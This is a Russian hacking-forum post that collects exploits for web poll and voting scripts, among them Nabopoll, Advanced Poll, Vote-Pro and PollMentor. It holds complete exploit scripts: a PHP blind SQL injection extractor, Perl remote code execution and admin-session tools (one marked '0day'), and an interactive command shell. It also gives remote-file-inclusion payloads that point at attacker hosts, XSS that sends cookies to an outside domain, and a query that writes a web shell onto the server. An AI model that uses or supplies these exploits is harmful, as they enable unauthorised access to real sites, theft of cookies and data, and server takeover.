|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
[..::Уязвимости скриптов голосования::..]
Nabopoll 1.2
Vendor: www.nabocorp.com/nabopoll/
Blind SQL Injection
Exploit:
PHP код:
<?
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com
error_reporting(0);
ini_set("max_execution_time",0);
// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; //you can verify the number entering in the site and viewing the results...
echo "==================================================\n";
echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- MySQL User: ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*";
$cnx = fsockopen($srv,$port);
fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");
while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
?>
RFI
PoC:
Код:
http://www.site.com/[path]/survey.inc.php?path=http://shell.txt?
Admin without password
Код:
http://target/nabopoll/admin/config_edit.php
http://target/nabopoll/admin/template_edit.php
http://target/nabopoll/admin/survey_edit.php
*Доступ к этим файлам может получить любой пользователь, без пароля
***
PollMentor v2.0
Vendor: http://www.aspindir.com/indir.asp?id=4406
PoC:
Код:
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--
***
Advanced Poll <= 2.0.5
Vulnerable: Advanced Poll 2.0.0 >= 2.0.5
Remote Code Execution
Exploit:
Код:
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
#
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# Hey, what a mad world!
#
use strict;
use warnings;
use LWP::UserAgent;
use MD5;
#
# args: http://url/apoll_path cmd
#
# proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/'
# url: http|https://tatget:(port)/phppoll/
#
die("RTFC! ;)") unless(@ARGV>1);
my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,undef,undef,$ARGV[0],$ARGV[1]);
my %ipost=
(
poll_tplset => 'default',
'tpl[display_head.html]' =>
<<HEAD
\\".system(getenv(HTTP_PHP)).exit().\\"
<table width="\$pollvars[table_width]" border="0" cellspacing="0" cellpadding="1" bgcolor="\$pollvars[bgcolor_fr]">
<tr align="center">
<td><style type="text/css">
<!--
.input { font-family: \$pollvars[font_face]; font-size: 8pt}
.links { font-family: \$pollvars[font_face]; font-size: 7.5pt; color: \$pollvars[font_color]}
-->
</style><font face="\$pollvars[font_face]" size="-1" color="#FFFFFF"><b>\$pollvars[title]</b></font></td>
</tr>
<tr align="center">
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="2" align="center" bgcolor="\$pollvars[bgcolor_tab]">
<tr>
<td height="40" valign="middle"><font face="\$pollvars[font_face]" color="\$pollvars[font_color]" size="1"><b>\$question</b></font></td>
</tr>
<tr align="right" valign="top">
<td>
<form method="post" action="\$this->form_forward">
<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
<tr valign="top" align="center">
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="1" align="center">
HEAD
,
action => '',
tplset => 'default',
tpl_type => 'display',
session => '',
uid => 1
);
my %epost=
(
session => '',
uid => 1,
poll_tplst => 'default',
tpl_type => 'display',
);
my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";
$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);
if($ENV{PROXY})
{
$lwp->proxy(['http','https'],$ENV{PROXY});
print "Using proxy ".$ENV{PROXY}."\n";
}
$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Doing some pretty with ".$url."...\n\n";
print "+ generating session...\n";
$out=$lwp->post($url,\%zday)->content();
if($out=~ /index\.php\?session=((.){32})/)
{
$ipost{'session'}=$epost{'session'}=$1;
print " session: ".$ipost{'session'}."\n";
$url=~s/index\.php/admin_templates\.php/g;
print "+ injecting diplay_head.html template...\n";
$out=$lwp->post($url,\%ipost)->content();
$epost{'action'}=$1 if($out=~ /<input type="submit" name="action" value="(.*)" class="button">/);
print " button: ".$epost{'action'}."\n";
$url=~s/admin_templates\.php/admin_preview\.php/g;
print "+ executing...\n";
$out=$lwp->post($url,\%epost,PHP => "echo BOCE;".$cmd.";echo EOCE")->content();
print "-- BOCE --\n";
foreach $out (split(/\n/,$out))
{
$res=1,next if($out=~/BOCE/);
$res=0,next if($out=~/EOCE/);
print $out."\n" if($res);
}
print "-- EOCE --\n";
}
else
{
print "don't worry, u can improve me! eh eh eh :D?\n";
}
sub md5
{
$_=new MD5;
$_->add(@_);
return unpack("H*",$_->digest());
}
Remote Admin Session Generator
Exploit:
Код:
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.
#
#
# 0day! KEEP IT PRIVATE 0day!
#
# date: 30/07/06
#
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# see templates for code execution ;).
use strict;
use warnings;
use LWP::UserAgent;
use MD5;
my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]);
my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";
#
# args: url proxy(optional)
#
# url: http|https://tatget:(port)/phppoll/
# proxy: http|https://hostname:(port)/
#
die("RTFC! ;)") unless(@ARGV);
# some lwp routines...
$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);
$lwp->proxy(['http','https'],$proxy) if(@ARGV>1);
$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Using proxy ".$proxy."\n" if($proxy);
print "Doing some pretty with ".$url."...\n\n";
$out=$lwp->post($url,\%zday)->content();
if($out=~ /index\.php\?session=((.){32})/)
{
print "well, you are a bigone ;).\n";
print "try: ".$url."?session=".$1."&uid=1\n";
}
else
{
print "don't worry, u can improve me! eh eh eh :D?\n";
}
sub md5
{
$_=new MD5;
$_->add(@_);
return unpack("H*",$_->digest());
}
RFI
Vulnerable: Advanced Poll 2.0.2
PoC:
Код:
http://www.example.com/[path_advanced_poll]/admin/common.inc.php?base_path=http:www.example.com
***
Flipper Poll v1.1.0
Vendor: http://sourceforge.net/project/showfiles.php?group_id=59828
RFI
PoC:
Код:
/poll.php?root_path=evilscripts?
***
Vote-Pro 4.0
Vendor: http://www.vote-pro.com/
Remote Code Execution
Exploit:
Код:
use IO::Socket;
$port = "80"; # connection port
$target = shift; # vote-pro.com
$folder = shift; # /votepro/
sub Header()
{
print q
{Vote-Pro Code Injection Exploit - writ3r [at] gmail.com
-------------------------------------------------------
};
}
sub Usage()
{
print q
{
Usage: votecmd.pl [target] [directory]
Example: votecmd.pl vote-pro.com /votepro/
};
exit();
}
Header();
if (!$target || !$folder) {
Usage(); }
print "[+] Connecting...\n";
$cmd = "dir";
while ($cmd !~ "exit")
{
$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
print $xpack "GET ".$folder."poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=".substr($cmd, 0, -1)."; HTTP/1.1\n";
print $xpack "Host: $target\n";
print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpack "Accept: text/html\n";
print $xpack "Connection: keep-alive\n\n";
print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
}
print "[!] Connection to host lost...\n";
***
LunarPoll 1.0
Vendor: http://dexxaboy.com/scripts/lunarpoll/download/
RFI
PoC:
Код:
show.php?PollDir=http://attacker.txt?
***
cwmVote 1.0
Vendor: http://explorer.cwm-design.de/dirs/41/cwmVote.rar
RFI
PoC:
Код:
http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]
***
Absolute Poll Manager
Vendor: http://www.xigla.com/absolutepm/
XSS
Vulnerable: XIGLA SOFTWARE Absolute Poll Manager XE 4.1
PoC:
Код:
http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script>
http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://www.example2.com/?"%2bdocument.cookie</script>
http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript%3elocation=%22http%3a//www.%65xample%2ecom/?%22%2bdocument.cookie%3c/script%3e&
***
PHPCentral Poll Script
Vendor: http://www.phpcentral.org/scripts.php
Remote Command Execution
Vulnerable: PHPCentral Poll Script v1.0
PoC:
Код:
http://www.example.com/poll.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&
cmd=id
http://www.example.com/pollarchive.php?_SERVER[DOCUMENT_ROOT]=http://evi
l.txt?&cmd=id
***
X-Scripts X-Poll
SQL Injection
PoC:
Код:
http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO
OUTFILE '/usr/webserver/public_htm/rshell.php
***
Comdev Vote Caster
Vendor: http://www.comdevweb.com/votecaster.php
SQL Injection
Vulnerable: Comdev VoteCaster 3.1
PoC:
Код:
http://www.example.com/index.php?pageaction=results&campaign_id=[SQL]
***
AzDGVote
RFI
PoC:
Код:
http://www.example.com/poll/view.php?int_path=http://attacker
http://www.example.com/ordinaopenpodcast/script/poll/view.php?int_path=http://attacker
*** |